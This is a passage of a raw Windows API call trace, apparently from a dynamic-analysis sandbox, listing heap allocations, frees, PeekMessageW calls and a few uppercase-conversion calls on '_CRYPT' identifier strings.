hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0246.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0246.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0246.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0246.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0246.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0246.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0246.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0246.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0246.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2f3c2f0 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0246.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0246.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0b0) returned 0x2e7f320 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3c2f0 | out: hHeap=0x970000) returned 1 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0246.459] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0246.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0246.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0246.460] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0246.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0246.461] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0246.461] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0246.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0246.461] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0246.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0246.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0246.461] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0246.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0246.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 